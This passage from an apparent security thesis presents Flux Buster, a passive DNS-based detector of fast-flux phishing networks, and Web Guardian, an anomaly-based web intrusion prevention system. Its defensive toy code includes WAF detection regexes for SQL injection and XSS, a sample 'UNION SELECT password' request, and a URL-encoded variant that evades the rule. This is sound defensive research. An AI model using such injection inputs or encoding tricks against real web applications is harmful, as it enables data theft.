contribution that we describe in this thesis is the conception and development of Flux
Buster [Perdisci, Corona et al. (2009)]. Flux Buster is a research tool which is able
to detect fast flux service networks through passive analysis of traffic collected from
Recursive Domain Name Servers (RDNS) on multiple Internet Service Provider
(ISP) networks. Our detection system is important for a variety of reasons. Firstly,
we may detect domain names which point to malicious websites through a more
advanced technique than domain name blacklists. We may look for intersections
between the set of IP addresses resolved by a domain name and the set of known
flux agents (i.e. IP addresses of computers pertaining to malicious flux networks
detected by Flux Buster). If an intersection is found, the domain may be deemed
suspicious and we may protect web users by denying the loading of the associated
URL (a minimal sketch of this test follows). In this thesis, we will show that such
an approach may also contribute to email spam filtering. In addition, we will show
that Flux Buster is able to detect a wide range of malicious websites which are not
noticed by querying the Google Safe Browsing API.
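
As a toy illustration of the intersection test just described (our own sketch; the
IP addresses and set sizes are hypothetical):

    # A domain is deemed suspicious if the IPs it resolves to overlap
    # the set of known flux agents produced by Flux Buster.
    known_flux_agents = {"198.51.100.7", "198.51.100.42", "203.0.113.9"}

    def is_suspicious(resolved_ips, flux_agents=known_flux_agents):
        # Any overlap with known flux agents flags the domain.
        return bool(set(resolved_ips) & flux_agents)

    # In practice a URL (from a page load or an email) would first be
    # reduced to its domain name and resolved; here we use canned data.
    if is_suspicious(["203.0.113.9", "198.51.100.250"]):
        print("domain flagged: deny URL loading / mark email as spam")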

Furthermore, Flux Buster allows us to get a clear view of the most popular websites
supported by malicious flux networks. This is fundamental to understand the actual
impact of flux networks, independently of the way such websites are advertised
on the Internet. Finally, the passive approach to the detection of malicious flux
networks allows us to detect them in a stealthy way. Contrary to previous work, there
is no interaction between our detection system and the malicious networks. As we will
explain in Section 3.1.2, this means that it is much harder for criminals to deceive
the detection system.

As evidenced in Section 2.3.2, web application vulnerabilities represent a
tremendous threat to Internet security. The state of the art in defence against server-side
web attacks is represented by Web Application Firewalls (WAF). Such systems match
incoming web requests (which may contain web application inputs) against a
predefined set of security rules. If a violation is found, they may perform some kind
of counteraction, e.g. drop or redirect the request. However, WAFs present some
relevant problems. Firstly, due to the rule-based approach, WAFs may detect and
provide protection against known attacks only. Secondly, even for simple web
applications, it is tedious, complex and error-prone to define suitable rules to detect
and block web attacks. Web applications (and their inputs) are typically highly
customized depending on the service specification and on the developer. Thus, security
rules must be customized depending on the web application in order to be effective.
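
To illustrate the rule-based approach and its limits, consider this toy sketch (the
two rules are deliberately naive inventions; real WAF rule sets are far larger):

    # Toy WAF: match incoming request URIs against predefined rules.
    import re

    rules = [
        re.compile(r"(?i)union\s+select"),  # naive SQL injection rule
        re.compile(r"(?i)<script"),         # naive XSS rule
    ]

    def waf_inspect(request_uri):
        # Counteraction (drop) only on a rule violation; anything that
        # no rule anticipates - including encoded variants of known
        # attacks - is forwarded untouched.
        if any(rule.search(request_uri) for rule in rules):
            return "drop"
        return "forward"

    print(waf_inspect("/search?q=shoes"))                    # forward
    print(waf_inspect("/search?q=1 UNION SELECT password"))  # drop
    print(waf_inspect("/search?q=%3Cscript%3E"))             # forward:
                                        # URL encoding evades the rule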

To cope with these issues, we studied and developed a research tool called Web
Guardian. Web Guardian is an anomaly-based Intrusion Prevention System. The
key task of Web Guardian is to model the normal profile of the web requests received
by the web server, without supervision. A relevant feature of Web Guardian is
the capability of explicitly handling the presence of noise (attacks) in its training
set. The normal profile of web requests is described through a set of independent
models. Each model describes the statistical profile of a specific feature of the web
requests. In this way, each model may be viewed as an anomaly sensor. A
counteraction module is employed to correlate the models' outputs and define the action
to be performed (a minimal sketch of this multi-model idea follows the list of
advantages below). This architecture has the following advantages:

• We may protect web services against both known and unknown attacks.

• Anomalies may identify the class of an attack: since the models are highly
specialized, the set of anomalies may identify the typology of the attack. This
is important to provide well-suited counteractions and to support forensic
procedures.

• Reduced learning time: a multi-model approach allows for a reduction of the
complexity of the learning task on each single model and avoids the well-known
curse-of-dimensionality problem.

• Extensibility: it is easy to extend Web Guardian with new models that take
into account other features of web requests.
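
As a minimal sketch of the multi-model idea (our own toy illustration: the two
features, the Gaussian sensors and the fusion rule are assumptions for exposition,
not Web Guardian's actual models, which are presented in Chapter 4):

    # One independent anomaly sensor per request feature, plus a simple
    # decision module that fuses the sensors' outputs.
    import statistics

    class GaussianSensor:
        # Models the normal profile of one scalar feature.
        def __init__(self, samples):
            self.mu = statistics.mean(samples)
            self.sigma = statistics.stdev(samples) or 1.0
        def score(self, x):
            # Higher score = more anomalous.
            return abs(x - self.mu) / self.sigma

    sensors = {  # training data is canned and attack-free for simplicity
        "request_length": GaussianSensor([120, 135, 110, 140, 125]),
        "num_parameters": GaussianSensor([2, 3, 2, 2, 3]),
    }

    def classify(request, threshold=4.0):
        anomalous = {f for f, s in sensors.items()
                     if s.score(request[f]) > threshold}
        # The set of anomalous sensors hints at the attack typology.
        return ("ALERT", anomalous) if anomalous else ("ok", set())

    print(classify({"request_length": 128, "num_parameters": 2}))
    print(classify({"request_length": 2048, "num_parameters": 2}))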

In this thesis, we will show that Web Guardian is able to detect simple as well
as sophisticated attacks against web servers and web applications. False alarms
are very few, and counteractions may be tuned to have a negligible probability of
affecting legitimate web requests, while retaining their effectiveness against malicious
web requests. In any case, through a web interface, the security administrator
may easily adjust the probability thresholds to cope with false alarms. Web Guardian
represents an extension and evolution of HMM-Web [Corona et al. (2009)], and
it is presented in Chapter 4.

Flux Buster and Web Guardian represent Intrusion Detection Systems (as
defined in Section 1.3)² that we propose to enhance the state of the art in Internet
(web) security. However, in this thesis we present another significant, more general,
research contribution.
The effectiveness of any Intrusion Detection System (IDS) depends upon the
IDS operating environment. This environment is constantly evolving and prefigures
a hostile component which is due to the presence of an adversary. This is clear
from the discussion in Section 2.4. The adversary is willing to evade or compromise
the security tool, reduce the accuracy of its results or divert its expected behavior.
The effectiveness of IDSs over time is strictly related to their capability to
cope with an adversary having these goals. Thus, we believe that the design of
future IDSs must necessarily address this issue. Nevertheless, this is not a trivial
problem. Many research works have highlighted open issues or proposed new solutions
related to this problem. Unfortunately, such works typically focused on specific
topics, discussed attacks against specific IDSs and often used different terms
for the same general concepts. As a consequence, an overall picture of the problem is
still lacking.
Thus, in Chapter 5, we critically review related work in terms of problem
formulation, contributions and proposed solutions. Then, we highlight the pros and
cons of each of the main IDS typologies, and suggest how to address the cons.
Our study may be employed as a reference either to design robust IDS solutions or
to evaluate the quality of different IDS solutions, depending on the specific intrusion
detection task. As we will see, the design of Flux Buster and Web Guardian reflects
many of the key features of adversary-aware IDS solutions.

²Flux Buster may be considered an IDS, if we consider fast flux networks as violations of Internet
security policies.
Chapter 3

Protecting web users

Throughout history, technological innovations have changed
the power balance between attacker and defender. Technology
can give the advantage to one party or to another, and new
attacks may be possible against technologically advanced systems
that were not possible against older, simpler systems.

Bruce Schneier

As mentioned in Section 2.5, fast flux service networks are increasingly adopted
to host malicious websites, supporting any kind of scam. The robustness and
pervasiveness of such malicious networks make the remediation of, and thus the
protection against, these websites a really hard problem. Nevertheless, even if we cannot
easily remediate these websites, we propose to protect web users by preventing the
loading of websites whose domain names resolve to flux networks. To this end, we
studied and developed Flux Buster, a research tool developed in
collaboration with Damballa, Inc. and the Georgia Tech Information Security
Center, Atlanta, USA. Flux Buster is an advanced system for the detection of fast
flux networks.
This chapter is organized as follows. First, in Section 3.1 we introduce the reader
to fast flux networks, previous work on the detection of such networks, and
the key contributions of our work. Then, in Section 3.2 we present Flux Buster in
more detail and evaluate its performance.
Subsequently, in Section 3.4 we employ Flux Buster in an operational setting.
We show how the output of Flux Buster may improve the detection of malicious
websites provided by the Google Safe Browsing API, the state-of-the-art protection
adopted by the most popular web browsers. Furthermore, we show how our system
may benefit spam filtering applications. Finally, in Section 3.4.3 we discuss the
limitations of Flux Buster, as well as some possible ways of improvement.

3.1 Introduction
3.1.1 Content Delivery Networks
Most high-profile organizations, such as Google, Microsoft, Yahoo! and Amazon,
employ legitimate Content Delivery Networks (CDNs) to offer their Internet services
world-wide. These networks allow optimizing the content delivery of high-volume
Internet services, with a high degree of availability, scalability and performance. A
CDN usually consists of a relatively large number of nodes scattered across multiple
locations around the world. Whenever a user requests a service provided through a
CDN, the CDN node closest to the user is usually chosen to provide the requested
content with high performance [Hofmann and Beaumont (2005)]. The closest node
is automatically selected considering a number of features, including the geographical
distance between the user and the CDN nodes, the traffic on each CDN node, and the
bandwidth of each CDN link. Each CDN node replicates the content provided by a
central server, for example using web caching [Hofmann and Beaumont (2005)].

Figure 3.1 shows the basic functioning of a CDN. Assume a user tries to connect
to a website (e.g. http://www.google.com). First, the browser tries to resolve
the related domain name (e.g. www.google.com). To this end, it queries the Recursive
Domain Name Server (RDNS) provided by the user's Internet Service Provider
(ISP). Then, the RDNS may query various DNS servers until reaching the authoritative
DNS for the specific domain name. The authoritative DNS server, according to the
current state of the CDN and the geographical position of the request source, replies
with one or more IP addresses corresponding to the closest CDN nodes. Subsequently,
the RDNS forwards this list to the user's browser. Finally, the browser
sends an HTTP GET message to the first IP address in this list, retrieving the HTTP
response (e.g. containing the main Google page). Typically, only if the first IP
address is not reachable will the browser contact the other IP addresses in the list.

It is worth noting that the list of IP addresses is valid only for a limited period
of time, defined by the Time To Live (TTL) parameter. In the example of Fig. 3.1,
this value is 50 seconds. Thus, this list is stored (cached) by the RDNS for
50 seconds only. If the browser sends another DNS query for the same website within
this interval, the RDNS won't contact the authoritative DNS again. Instead, in
order to redistribute the load among equivalent nodes, the RDNS will return the
same list of IP addresses, but in a different order, e.g. following a Round-Robin
algorithm [Brisco (1995)]. After TTL seconds, if the user wants to connect to the
same website, the whole process above is repeated. In general, relatively low TTL
values (e.g. 20 or 50 seconds) are necessary to provide users with an updated list of
nodes, in order to optimize the content delivery process.
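
The following minimal sketch (our own illustration; the class and function names
are invented) simulates this RDNS-side behavior: a cache miss or an expired TTL
triggers a query to the authoritative DNS, while a cache hit within the TTL returns
the same list rotated in round-robin fashion:

    import time
    from collections import deque

    class RdnsCache:
        def __init__(self):
            self._cache = {}  # domain -> [deque of IPs, expiry time]

        def resolve(self, domain, query_authoritative):
            entry = self._cache.get(domain)
            if entry is None or time.time() >= entry[1]:
                # Cache miss or TTL expired: ask the authoritative DNS.
                ips, ttl = query_authoritative(domain)
                entry = [deque(ips), time.time() + ttl]
                self._cache[domain] = entry
            else:
                # Cache hit: rotate the list (round-robin balancing).
                entry[0].rotate(-1)
            return list(entry[0])

    def authoritative(domain):
        # Hypothetical authoritative DNS: three CDN nodes, TTL = 50 s.
        return ["192.0.2.10", "192.0.2.11", "192.0.2.12"], 50

    cache = RdnsCache()
    print(cache.resolve("www.example.com", authoritative))  # fetched
    print(cache.resolve("www.example.com", authoritative))  # rotated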

3.1.2 Malicious fast flux service networks


Internet miscreants and cyber-criminals are always looking for new ways to cover the
traces of their malicious activities while preserving their illicit revenues. To this end,
malicious flux service networks have recently started to thrive [SAC (2008)]. Malicious
flux service networks can be viewed as illegitimate content delivery networks
(CDNs).

Dierently from legitimate CDNs, whose nodes are professionally administered


machines, the nodes of a malicious ux service network, a.k.a. ux agents, are
represented by malware-infected machines. Most bot malware (i.e., the malicious
3.1. Introduction 23

Figure 3.1: Basic functioning of a Content Delivery Network. The user retrieves the
main Google page.
24 Chapter 3. Protecting web users

Figure 3.2: Basic functioning of a malicious fast flux service network. The user retrieves a fake facebook login page, advertised by means of an email very similar to legitimate facebook emails.

software that turns a machine into a botnet member) is able to infect a high number of machines around the world (e.g., through a worm-like propagation), in particular poorly administered home-user machines. The flux agents are usually part of a botnet and can be remotely controlled by the malware author, who is often referred to as the bot-herder. Actually, the bot-herder may just lease the use of (a part of) her botnet to a fast flux service operator (in the following, flux operator). This operator may work in collaboration with spammers, in order to advertise her malicious websites through a variety of means (e.g. email spam, blog spam, search engine spam) [SH (2010)]. The flux operator in turn may sell her illicit fast flux service to a customer, e.g. to support a particular scam campaign [SAC (2008)]. Of course, more complex relationships are possible. The key point is that the know-how and organization of these Machiavellian miscreants make this problem a tremendous and pervasive threat.
In order to set up a flux service, the flux operator registers a number (hundreds or even thousands) of so-called fast-flux domain names. To this end, the operator typically employs multiple domain name registrars world-wide. Domain names are routinely registered by using stolen user credentials and paying with stolen credit card numbers. Each registration associates a domain name with an authoritative DNS. The authoritative DNS is a computer tightly controlled by the malicious operator. For example, it may be a computer of the botnet (e.g. under leasing purchase) with a public IP address and high uptime. In such a way, whenever a RDNS tries to resolve one of the registered domain names, it will finally query this computer to get an updated list of IP addresses. The operator sets up the authoritative DNS so that this list reflects the addresses of active flux agents. On the other hand, each flux agent may be turned on and off at any moment by its owner. In other words, it is difficult for the flux operator to control or predict the uptime of each flux agent. Therefore, in order to provide malicious content with relatively high availability and load balancing, authoritative DNS servers are usually configured to provide a different (large) set of resolved IP addresses (i.e., of flux agents) at every new DNS query, to increase the chance of returning at least one IP address that will be reachable and able to provide the malicious content at any given time. In practice, fast-flux domain names allow flux operators to apply light-weight load balancing of content requests on a large number of flux agents, thus effectively accomplishing high availability at the expense of the compromised nodes.
More complex network structures are possible. In some flux network schemes, a number of flux agents may also act as authoritative name servers, namely the servers that will be contacted directly by the RDNS resolver to obtain the list of IPs associated to fast-flux domain names. Such flux networks are usually referred to as double-flux [KYE (2007), SAC (2008)].
Malicious flux service networks are commonly used to host phishing websites and illegal adult websites, or to serve as malware propagation vectors, for example. Consider the scenario of Figure 3.2, in which a malicious organization, the customer, wants to steal facebook users' credentials for illicit purposes (e.g. advanced social engineering [Mitnick (2002)]). The customer may pay a flux operator to set up the

whole scam. Firstly, the flux operator registers a number of domain names (e.g. mysession21.com, · · · , sessionnew83.com, xsessionid.com) that resolve to her flux agents, which will return a fake facebook login page. She then contacts a spammer to send a large number of phishing emails that signal a new message from a facebook user (e.g. Rob), in order to attract web traffic from victim users. This email may look very similar to legitimate facebook notifications, except that all the links contain a fast flux domain name, e.g. login.facebook.sessionnew83.com. When a user receives one of such emails and clicks on the advertised URL, her browser will resolve the domain name login.facebook.sessionnew83.com and will be redirected to one of the flux agents. The flux agents will then provide a web page that looks just like the login interface on facebook.com, but has the ability to steal any information provided by the user and submit it to the customer.

The flux agents may have two roles. In some cases they may function as transparent web proxies to the real content provider machine, instead of storing the malicious content locally. In the example above, this means that when the browser is redirected to one of the flux agents to access the phishing login web page, the flux agent will contact another machine under control of the flux operator, download the malicious content and forward it to the user's browser. The machine that actually provides the malicious content through the flux agents is often referred to as the mothership, as shown in Figure 3.2. Thus, when flux agents act as transparent proxies they effectively hide the real source of the malicious content.

Besides offering high availability of malicious content, malicious flux networks are very hard to block. Fast flux networks may contain hundreds or even thousands of independent flux agents. This network architecture makes it harder for law enforcement to identify and shut down the actual source of malicious content. An alternative would be to remediate the malware infection on each single flux agent. Unfortunately, this is often extremely expensive, given the high number of malware-compromised machines that (unintentionally) participate in malicious flux networks. Furthermore, these machines are often scattered across many nations, therefore requiring a coordinated international response effort. Another possibility would be to cancel the registration of fast flux domains. However, this requires the collaboration of domain name registrars world-wide, which is not an easy task. In any case, this task is complicated by the fact that flux operators may register hundreds of new flux domain names on a daily basis.

3.1.3 Detecting Fast Flux Service Networks


A number of approaches for detecting fast-flux domain names have been recently studied in [Holz et al. (2008), Passerini et al. (2008), Nazario et al. (2008), Konte et al. (2009)], for example. To the best of our knowledge, these works differ from each other in the number of features used to characterize fast flux domains and in the details of the classification algorithms, but are all limited to mainly studying fast-flux domains advertised through email spam (domain names found in domain blacklists and malware samples are also considered in some works, but they are very few compared to the domain names extracted from spam emails). In particular, given a dataset of spam emails (typically captured by spam traps and filters), potential fast-flux domain names are identified by extracting them from the URLs found in the body of these emails [Holz et al. (2008), Passerini et al. (2008), Nazario et al. (2008), Konte et al. (2009)]. Then, an active probing strategy is applied, which repeatedly issues DNS queries to collect information about the set of resolved IP addresses and to classify each domain name as either fast-flux or non-fast-flux. The work in [Hu et al. (2009)] is in part different from other previous work, because it is not limited to domains found in spam emails. Hu et al. [Hu et al. (2009)] propose to analyze NetFlow information collected at border routers to identify redirection botnets, which are a specific kind of botnets used to set up redirection flux service networks. However, the information they extract from network flows is not able to detect flux agents that are being used as transparent proxies, instead of redirection points. Also, the work in [Hu et al. (2009)] is heavily based on a DNS analysis module that applies active probing in a way very similar to [Holz et al. (2008), Passerini et al. (2008)], in order to collect the information necessary to perform the classification of suspicious domains collected from spam emails and the correlation with network flow information.

3.1.3.1 Our contribution

Flux Buster adopts a novel, passive approach for detecting and tracking malicious flux service networks. It is based on the passive analysis of recursive DNS traces collected from multiple large networks. In practice, as shown in Figure 3.3, we deploy a sensor in front of the recursive DNS (RDNS) server of different networks, passively monitor the DNS queries and responses from the users to the RDNS, and selectively store information about potential fast-flux domains into a central DNS data collector. Since the amount of RDNS traffic in large networks is often overwhelming, we devised a number of prefiltering rules that aim at identifying DNS queries to potential fast-flux domain names, while discarding the remaining requests to legitimate domain names. Our prefiltering stage is very conservative; nevertheless, it is able to reduce the volume of the monitored DNS traffic to a tractable amount without discarding information about domain names actually related to malicious flux services. Once information about potential malicious flux domains has been collected for a certain epoch E (e.g., one day), we perform a more fine-grained analysis. First, we apply a clustering process to the domain names collected during E, and we group together domain names that are related to each other. For example, we group together domain names that point to the same Internet service, are related to the same CDN, or are part of the same malicious flux network. Once the monitored domain names have been grouped, we classify these clusters of domains and the related monitored resolved IP addresses as either being part of a malicious flux service network or not. This is in contrast with most previous works, in which single domain names

Figure 3.3: RDNS Data Collection Architecture.

are considered independently from each other, and classified as either fast-flux or non-fast-flux [Holz et al. (2008), Passerini et al. (2008), Konte et al. (2009)].

Our detection approach has a fundamental advantage compared to previous work. Passively monitoring live users' DNS traffic offers a new vantage point, and allows us to capture queries to flux domain names that are advertised through a variety of means, including for example blog spam [Mishne et al. (2005)], social website spam [Heymann et al. (2007)], search engine spam [Gyongyi et al. (2005)], and instant messaging spam [Liu et al. (2005)], besides email spam and precompiled domain blacklists such as the ones used in [Holz et al. (2008), Passerini et al. (2008), Nazario et al. (2008), Konte et al. (2009)]. Furthermore, differently from the active probing approach used in previous work [Holz et al. (2008), Passerini et al. (2008), Nazario et al. (2008), Konte et al. (2009)], we passively monitor live users' traffic without interacting ourselves with the flux networks. Active probing of fast-flux domain names may be detected by the attacker, who controls the authoritative name servers responsible for responding to DNS queries about her fast-flux domain names. If the attacker detects that an active probing system is trying to track her malicious flux service network, she may stop responding to queries coming from the probing system to prevent unveiling further information. On the other hand, our detection system is able to detect flux services in a stealthy way.

Finally, the active probing of fast-flux domains used in previous work [Holz et al. (2008), Passerini et al. (2008), Nazario et al. (2008), Konte et al. (2009)] is expensive. The reason is that the volume of new spam-related domain names received every day by a typical spam trap is usually high, and constantly probing all of them is sustainable only through a careful optimization of the probing algorithm and the use of a distributed architecture.

Figure 3.4: Overview of our detection system.

Goals and assumptions Flux Buster aims at detecting malicious flux networks in the wild. It passively processes the RDNS traffic generated by a large user base (see Figure 3.3). We assume that during their normal Internet experience some of these users will (intentionally or unintentionally) request malicious content served through a flux network. In practice, given the large user base we are able to monitor, it is very likely that at least some of these users will (unfortunately) fall victim to malicious web content, and will therefore click on (and initiate DNS queries about) flux domain names. We aim to detect such events, and track the flux domain names and the IP addresses of the related flux agents contacted by the victims in the monitored network. Since we perform passive analysis and we monitor real users' activities, we can stealthily detect and collect information about popular malicious flux networks on the Internet, regardless of the method used by flux operators to advertise the malicious content served by their flux networks. This is important to provide a preemptive protection to web users against any scam supported by malicious flux networks.

3.2 Flux Buster


Figure 3.4 presents an overview of our malicious flux service detection system. For each RDNS sensor (see Figure 3.3), we monitor the sequence of DNS queries and responses from/to the users' machines for a predefined period of time, or epoch, E (e.g., one day). The amount of DNS traffic towards RDNS servers is often overwhelming, even for medium- and small-size networks. Therefore, our detection system first applies a number of filtering rules to reduce the volume of traffic to be analyzed. Since we are only interested in flux domain names and their resolved IPs, the traffic volume reduction filter F1 is responsible for identifying DNS queries that are most likely related to flux domains (in the remainder we will sometimes use domain in place of domain name, for the sake of brevity), while filtering out queries to domains that are very unlikely to be fluxing. A list L of candidate flux domain names is

kept in memory and updated periodically. This list contains historic information about candidate flux domain names, namely the maximum TTL ever seen for each domain name, the set of resolved IPs extracted from the DNS responses over time, etc. At the end of every period ∆T < E (e.g., ∆T may be equal to a few hours), the list of candidate flux domain names is checked by filter F2 to verify whether they are still likely to be flux domains, according to the collected historic information. For example, F2 checks whether the set of resolved IPs returned by the RDNS for a given domain name has grown during ∆T. In fact, if a domain name was queried several times during ∆T, but no new resolved IP was observed, it is unlikely that the domain name is associated to a malicious flux service. On the other hand, if the set of resolved IPs returned by the RDNS for a certain domain name keeps changing after every TTL, the domain name is considered a good candidate flux domain. The domain names that are found not to be likely flux-related are pruned from the list L.

At the end of each epoch E, the remaining candidate flux domains in L and the related historic information are transferred from the RDNS sensors to our Detector machine (see Figure 3.3), where we perform further analysis. In particular, in this phase we aim at clustering together domain names related to the same service. We group domains according to their resolved IP sets. Namely, given two candidate flux domain names, if their sets of resolved IPs collected during the epoch E intersect (i.e., the two domain names share a significant fraction of resolved IPs), we consider the two domain names as similar. Given this notion of IP-based similarity, we apply a hierarchical clustering algorithm to group domain names that are related to each other. In practice, each of the obtained clusters represents a separate candidate flux service network. It is worth noting that filters F1 and F2 are very conservative. They will accept domains related to malicious flux services, but may also accept a number of domains related to legitimate services.

Some legitimate services, such as legitimate CDNs (e.g., Akamai, www.akamai.com), NTP server pools (www.pool.ntp.org), IRC server pools, etc., are served through sets of domain names that share some similarities with fast-flux domains. For example, domains related to legitimate CDNs often have a very low TTL and resolve to multiple IP addresses located in different networks. Also, domains related to NTP server pools use a very high number of IP addresses which change periodically using a round-robin-like algorithm.

As a consequence, a cluster of domains may represent a malicious flux service, a legitimate CDN, a pool of NTP servers, etc. Therefore, after clustering, each candidate flux service network (i.e., each cluster of domain names and the related resolved IPs) is given to a service classifier, which is trained to classify each cluster as either a malicious flux service or a legitimate/non-flux service. In the following we describe each single component of our detection system in more detail.

3.2.1 Traffic Volume Reduction (F1)


In order to describe the traffic volume reduction filter F1, we first need to formally define how the DNS queries and related responses are represented by our system. Let $q^{(d)}$ be a DNS query performed by a user at time $t_i$ to resolve the set of IP addresses owned by domain name $d$. We formally define the information in the query and its related response as a tuple $q^{(d)} = (t_i, T^{(d)}, P^{(d)})$, where $T^{(d)}$ is the time-to-live (TTL) of the DNS response, and $P^{(d)}$ is the set of resolved IPs returned by the RDNS server. Also, let $prefix(P^{(d)}, 16)$ be the set of distinct /16 network prefixes extracted from $P^{(d)}$. For example, assuming $P^{(d)} = \{10.0.1.12, 10.0.2.45, 10.3.2.119\}$, then $prefix(P^{(d)}, 16) = \{10.0, 10.3\}$.


In order to reduce the volume of DNS traffic (see filter F1 in Figure 3.4) without discarding information about the domain names that are most likely related to malicious flux services, we use the following filtering rules. We accept only DNS queries (and related responses) that respect all of the following constraints:

F1-a) $T^{(d)} \leq 10800$ seconds (i.e., 3 hours).

F1-b) $|P^{(d)}| \geq 3$ OR $T^{(d)} \leq 30$.

F1-c) $p = \frac{|prefix(P^{(d)},16)|}{|P^{(d)}|} \geq \frac{1}{3}$,

where $p$ is the ratio between the number of distinct /16 network prefixes and the total number of resolved IPs. We now briefly motivate the choice of these filtering rules.
As mentioned in Section 3.1.2, flux domains are characterized by a low TTL, which is usually in the order of a few minutes [KYE (2007)] and allows the set of resolved IPs to change rapidly. Rule F1-a excludes all the queries to domain names whose TTL exceeds three hours, because such domain names are unlikely to be fluxing. Rule F1-b takes into account the fact that DNS queries to flux domain names usually return a relatively large number ($\geq 3$) of resolved IPs [KYE (2007)]. The reason for this is that, as mentioned in Section 3.1.2, the uptime of each flux agent is not easily predictable. A large set of resolved IPs provides a sort of fault-tolerance mechanism for the flux service. However, a similar result may also be obtained by setting up flux domains that return a very small set of resolved IPs (e.g., only one per query) but have a very low TTL (e.g., equal or close to zero). This way, if a flux agent is down, a new flux agent can be immediately discovered by performing another DNS query, because the previous response will be quickly evicted from the RDNS's cache. Rule F1-b takes into account both these scenarios. Rule F1-c is motivated by the fact that the flux agents are often scattered across many different networks and organizations (e.g., the infected machines may be scattered across several different academic networks, ISP networks, enterprise networks, etc.). On the other hand, most legitimate (non-flux) domain names resolve to IP addresses residing in one or few different networks (e.g., IPs all residing in the same sub-network of the organization that provides a legitimate Internet service). We use the function $prefix(P^{(d)}, 16)$ to estimate the number of different networks in which the resolved IPs reside (ideally, one would decide whether two IPs belong to two different networks by mapping each IP to its AS number and then comparing the AS numbers; however, it may be hard to do this efficiently, and in our experience /16 prefixes give an efficiently computable, good approximation of this result), and the ratio $p$ (rule F1-c) allows us to identify queries to domains that are very unlikely to be part of a malicious flux service.
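
As a concrete illustration, here is a minimal Python sketch of rules F1-a, F1-b and F1-c as formulated above; the function name and the representation of $P^{(d)}$ as a set of dotted-quad strings are our own assumptions.

    def f1_accepts(ttl, resolved_ips):
        """Sketch of filter F1. `ttl` is T(d); `resolved_ips` is the set
        P(d), represented here as dotted-quad strings."""
        # F1-a: TTL of at most 3 hours
        if ttl > 10800:
            return False
        # F1-b: at least 3 resolved IPs, OR a very low TTL
        if not (len(resolved_ips) >= 3 or ttl <= 30):
            return False
        # F1-c: /16 network prefix ratio p >= 1/3
        prefixes = {".".join(ip.split(".")[:2]) for ip in resolved_ips}
        return len(prefixes) / len(resolved_ips) >= 1.0 / 3.0

    # Low TTL, 4 IPs scattered over 3 distinct /16 prefixes -> accepted
    print(f1_accepts(180, {"10.0.1.12", "10.0.2.45", "10.3.2.119", "11.7.0.2"}))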

3.2.2 Periodic List Pruning (F2)


While monitoring the recursive DNS traffic, each sensor maintains a list $L$ of candidate flux domain names. The list $L$ stores historic information about the candidate flux domains and is updated every time a DNS query passes filter F1. In order to explain how $L$ is updated, let us formally define how a candidate flux domain name is represented. At any time $t_i$, a candidate flux domain name $d$ can be viewed as a tuple $d = (t_i, Q_i^{(d)}, \hat{T}_i^{(d)}, R_i^{(d)}, G_i^{(d)})$, where $t_i$ is the time when the last DNS query for $d$ was observed, $Q_i^{(d)}$ is the total number of DNS queries related to $d$ ever seen until $t_i$, $\hat{T}_i^{(d)}$ is the maximum TTL ever observed for $d$, $R_i^{(d)}$ is the cumulative set of all the resolved IPs ever seen for $d$ until time $t_i$, and $G_i^{(d)}$ is a sequence of pairs $\{(t_j, r_j^{(d)})\}_{j=1..i}$, where $r_j^{(d)} = |R_j^{(d)}| - |R_{j-1}^{(d)}|$, i.e., the number of new resolved IPs observed at time $t_j$, compared to the set of resolved IPs seen until $t_{j-1}$. We store only the pairs $(t_j, r_j^{(d)})$ for which $r_j^{(d)} > 0$. Therefore $G_i^{(d)}$ registers when and by how much the resolved IP set of $d$ grew, until time $t_i$. When a new DNS query $q^{(d)} = (t_k, T^{(d)}, P^{(d)})$ related to $d$ passes filter F1, the data structure $d \in L$ is updated according to the information in $q^{(d)}$.

In order to narrow down the number of candidate flux domains and only consider the ones that are most likely related to malicious flux services, the list $L$ is pruned at the end of every interval $\Delta T < E$ (e.g., every $\Delta T = 3$ hours). That is, every $\Delta T$ we check the status of each candidate flux domain $d \in L$. Let $t_j$ be the time when this pruning check occurs. Also, let $p = \frac{|prefix(R_j^{(d)}, 16)|}{|R_j^{(d)}|}$ be the network prefix ratio (see Section 3.2.1) for the cumulative set of resolved IPs of $d$ ever seen until $t_j$. We remove from $L$ those domain names for which

F2-a) $Q_j^{(d)} \geq 100$ AND $|G_j^{(d)}| < 3$ AND ($|R_j^{(d)}| \leq 5$ OR $p \leq 0.5$).

Rule F2-a filters out those domains for which we monitored more than 100 queries, the cumulative set of resolved IPs did not grow more than twice, and the total number of resolved IPs ever seen is low ($\leq 5$) or the network prefix ratio $p$ is low ($\leq 0.5$). The filter F2 is justified by the characteristics of flux domain names described in Section 3.1.2, and domain names that do not pass F2 are very unlikely to be related to flux services.
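
The following Python sketch illustrates how the pruning check F2-a could be evaluated over the historic record of a candidate flux domain; the dictionary layout mirrors the tuple $(Q_j^{(d)}, R_j^{(d)}, G_j^{(d)})$ from the text, but the field names are hypothetical.

    def f2_prunes(record):
        """Sketch of pruning rule F2-a over the historic record of a
        candidate flux domain d; the field names are hypothetical."""
        Q = record["num_queries"]       # Q_j: queries seen so far
        R = record["resolved_ips"]      # R_j: cumulative resolved-IP set
        G = record["growth_events"]     # G_j: pairs (t, r) with r > 0
        prefixes = {".".join(ip.split(".")[:2]) for ip in R}
        p = len(prefixes) / len(R) if R else 0.0
        # Many queries, almost no growth, and few or concentrated IPs
        return Q >= 100 and len(G) < 3 and (len(R) <= 5 or p <= 0.5)

    record = {"num_queries": 250,
              "resolved_ips": {"10.0.1.1", "10.0.1.2", "10.0.2.3"},
              "growth_events": [(1.0, 3)]}
    print(f2_prunes(record))  # True: this domain would be removed from L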

3.2.3 Further Domain Filtering (F3, optional)


Before applying domain clustering, we further narrow down the number of candidate domain names using a set of filtering rules. This further filtering step is optional, and we mainly use it to reduce the amount of memory required by the clustering algorithm. These filtering rules may be tuned (or eliminated) to accept more domains for the clustering step if more memory were available. This additional filtering step reduces the average number of candidate flux domains to be clustered by almost an order of magnitude (from $4 \cdot 10^4$–$6 \cdot 10^4$ to about $8 \cdot 10^3$ domains per sensor). It is worth noting, though, that similarly to filters F1 and F2, these filtering rules are still very conservative. In fact, from our experimental results we noticed that even after this further filtering, the list of candidate domain names still included all the domain names most likely related to malicious flux services, along with domain names related to legitimate CDNs, pools of NTP servers, and other legitimate services. As mentioned in Section 3.2, domain names related to legitimate CDNs and pools of NTP servers, for example, share some similarities with fast-flux domains, and given that our filtering rules are very conservative (i.e., they aim at not rejecting any potential flux domain, but may also include non-flux domains), these domains tend to be included in our list of candidate flux domains.
